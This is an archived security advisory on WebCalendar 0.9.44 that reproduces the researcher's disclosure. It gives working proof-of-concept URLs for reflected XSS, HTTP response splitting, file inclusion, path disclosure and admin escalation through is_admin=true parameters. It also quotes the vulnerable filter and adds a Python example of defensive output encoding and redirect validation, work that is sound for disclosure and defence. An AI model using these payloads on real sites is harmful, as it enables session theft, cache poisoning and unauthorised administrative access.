SecurityTracker Archives
Category:   Application (Generic)  >   WebCalendar
Vendors:   Knudsen, Craig
WebCalendar Grants Administrative Access and Permits Cross-Site Scripting and HTTP Response Splitting Attacks
SecurityTracker Alert ID:  1012168
SecurityTracker URL:  http://securitytracker.com/id/1012168
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 10 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 0.9.44
Description:   Several vulnerabilities were reported in WebCalendar. A remote user can conduct cross-site scripting and HTTP response splitting attacks. A remote user can determine the installation path. A remote user can gain administrative access to the application.

Joxean Koret reported that the software does not properly filter HTML code from IMG tags. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the WebCalendar software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javas

http://[target]/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:

http://[target]/demo/usersel.php?form=editentryform.elements[20];
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2

http://[target]/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"
ookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001

http://[target]/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=&t

http://[target]/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=ja;

http://[target]/demo/includes/styles.php?FONTS=asdf}%0A--></style>&lt;script&gt;alert(document.cookie)&lt;/script&a

All global parameters are affected.

It is also reported that a remote user can submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks. The 'login.php' script is affected.

A demonstration exploit URL is provided:

http://[target]/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0a

A local user can create a file in a web-accessible directory and then load the following type of URL to cause the web server to execute the file. A demonstration exploit URL is provided:

http://[target]/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other

It is also reported that a remote user can invoke the following URL to determine the installation path:

http://[target]/demo/includes/validate.php?encoded_login=

It is also reported that a remote user can gain administrative access to the application.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the WebCalendar software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

A remote user can gain administrative access to the application.

Solution:   A fix is available via CVS.
Vendor URL:  webcalendar.sourceforge.net
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple Vulnerabilities in WebCalendar




--------------------------------------------------------------------------- 
              Multiple Vulnerabilities in WebCalendar 
--------------------------------------------------------------------------- 
 
Author: Jose Antonio Coret (Joxean Koret) 
Date: 2004  
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
WebCalendar - Web Calendar Application 
 
WebCalendar is a PHP application used to maintain a calendar for a single user or an intranet group of users. It can also be configured as an event calendar. 
 
Web : http://webcalendar.sourceforge.net 
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Cross Site Scripting Vulnerabilities in various scripts. 
 
A1. WebCalendar checks for the <script>any</script> form of XSS attack but doesn't check <img src>-based attacks. To test the vulnerabilities you can try the following POCs:  
 
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
 
 
http://<site-with-webcalendar>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
 
 
http://<site-with-webcalendar>/demo/usersel.php?form=editentryform.elements[20];
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2 
 
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.c
ookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001 
 
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
 
 
http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>
 
 
http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>
 
NOTE: Almost any GLOBAL parameter in this script is vulnerable. 
 
 
B. HTTP Response Splitting Error 
 
B1. Due to poor input validation in the script login.php, HTTP Response Splitting attacks are possible. You can try the vulnerability with the following POC:  
 
http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi
 
to all 
 
 
C. Possible code execution 
 
C1. If an attacker is able to upload a file via FTP or another system to the web directory, there is a flaw that allows any file in the web tree to be executed. To try the vulnerability you can try this URL:  
 
http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other 
 
Note: This is almost a full path disclosure. 
 
D. Full Path Disclosure 
 
D1. Because of poor validation of the parameter encoded_login in the PHP script validate.php, there is a vulnerability that shows the full path of the script on the web server. 
 
http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login= 
(Full Path Disclosure) 
 
E. Admin Privileges 
 
E1. To perform various actions you need to be the administrator of the WebCalendar application, but various scripts are vulnerable to Variable Poisoning attacks. Privilege escalation is possible using the following methods:  
 
 
Example 1 :  
 
You don't have permission:  
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true 
 
But using it, yes: 
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true 
 
Example 2 :  
 
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id=
 
 
Example 3 :  
 
No permission -> 
http://webcalendar.sourceforge.net/demo/upcoming.php 
Permission Granted :) -> 
http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y 
 
Notes 
~~~~~ 
 
The poor method used to protect against XSS attacks in the script functions.php is the following: 
 
// This code is a temporary hack to make the application work when
// register_globals is set to Off in php.ini (the default setting in
// PHP 4.2.0 and after).
if ( ! empty ( $HTTP_GET_VARS ) ) {
  while (list($key, $val) = @each($HTTP_GET_VARS)) {
    // don't allow anything to have <script> in it...
    if ( ! is_array ( $val ) ) {
      // the only filter applied: a case-insensitive search for "<script"
      if ( preg_match ( "/<\s*script/i", $val ) ) {
        echo "Security violation!"; exit;
      }
    }
    // (remainder of the loop body not quoted in the advisory)
  }
}
 
It is very easy to bypass these basic security checks by using Unicode-encoded strings, or any other valid XSS attack, such as <img src> attacks. 
 
More Notes 
~~~~~~~~~~ 
 
The developers of WebCalendar (especially Jeff Hoover) have demonstrated seriousness with the fixes and responses about these errors. 
 
The fix: 
~~~~~~~~ 
 
The problems have been fixed in the CVS repository. 
 
Disclaimer: 
~~~~~~~~~~~ 
 
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. 

I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.  
 
--------------------------------------------------------------------------- 
 
Contact: 
~~~~~~~~ 
 
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es 
 
 
 
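The following is an added example, not code from WebCalendar or from the advisory author, written in Python rather than PHP so it can be run stand-alone. It reproduces the `/<\s*script/i` blacklist quoted from functions.php, shows that the advisory's `<img onload=...>` payload passes it untouched, and contrasts two defensive controls: HTML output encoding, and a validator for login.php's `return_path` that rejects the CR/LF bytes the response-splitting PoC depends on (function and constant names are this example's own).

```python
# Added example, not WebCalendar's code: the `/<\s*script/i` check quoted from
# functions.php beside two defensive controls (HTML output encoding and a strict
# redirect-target validator for login.php's return_path). Payloads are decoded
# from the advisory's PoC URLs.
import html
import re
from typing import Optional
from urllib.parse import unquote

# The only check the quoted hack performs: reject values containing "<script".
SCRIPT_BLACKLIST = re.compile(r"<\s*script", re.IGNORECASE)

def passes_blacklist(value: str) -> bool:
    """True when the quoted check would let this value through unchanged."""
    return SCRIPT_BLACKLIST.search(value) is None

def escape_for_html(value: str) -> str:
    """Output encoding: '<', '>', '&' and quotes become entities, so the value
    can neither close the surrounding attribute nor open a new tag."""
    return html.escape(value, quote=True)

def safe_return_path(raw: str) -> Optional[str]:
    """Redirect-target validator: rejects CR/LF/NUL (what the response-splitting
    PoC relies on) and anything that is not a site-relative path. Returns None
    so the caller falls back to a fixed default instead of echoing input."""
    value = unquote(raw)
    if any(ch in value for ch in "\r\n\0"):
        return None
    if not value.startswith("/") or value.startswith("//"):
        return None
    return value

# Constructed from the advisory's view_entry.php and login.php PoC URLs.
IMG_PAYLOAD = unquote('41972"><img%20src=http://images.sourceforge.net/images/'
                      'head_bg_new.gif%20onload=javascript:alert(document.cookie)>')
SPLIT_PAYLOAD = ("%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
                 "%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi")

def demo() -> dict:
    """What each control does with the advisory's payloads."""
    return {
        "img_passes_blacklist": passes_blacklist(IMG_PAYLOAD),       # True
        "script_passes_blacklist": passes_blacklist("<script>x</script>"),  # False
        "escaped_img_is_inert": "<" not in escape_for_html(IMG_PAYLOAD),  # True
        "split_payload_rejected": safe_return_path(SPLIT_PAYLOAD) is None,  # True
        "normal_path_accepted": safe_return_path("/demo/month.php"),  # "/demo/month.php"
    }
```

The point of `demo()` is the first two entries side by side: the blacklist stops the literal `<script>` case the author says WebCalendar checks for and nothing else, while encoding at output time neutralises the payload regardless of which tag it uses.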
Copyright 2020, SecurityGlobal.net LLC